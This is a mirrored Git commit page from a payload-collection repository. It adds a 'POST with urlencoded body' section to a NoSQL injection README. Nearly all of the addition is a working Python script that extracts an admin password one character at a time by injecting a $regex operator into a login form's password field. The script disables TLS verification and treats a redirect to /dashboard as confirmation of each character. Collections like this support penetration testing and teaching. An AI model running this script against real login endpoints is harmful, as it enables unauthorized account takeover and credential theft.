Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-13 23:02:46 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #457 from noraj/patch-1

Browse source 
NoSQLi: add POST with urlencoded body
This commit is contained in:
Swissky 2021-11-07 21:16:06 +01:00 committed by GitHub
commit a6eac592e1
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
NoSQL Injection/README.md
View file

@ -98,6 +98,30 @@ while True:
password += c password += c
``` ```
### POST with urlencoded body
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
u="http://example.org/login"
headers={'content-type': 'application/x-www-form-urlencoded'}
while True:
for c in string.printable:
if c not in ['*','+','.','?','|','&','$']:
payload='user=%s&pass[$regex]=^%s&remember=on' % (username, password + c)
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
if r.status_code == 302 and r.headers['Location'] == '/dashboard':
print("Found one more char : %s" % (password+c))
password += c
```
### GET ### GET
```python ```python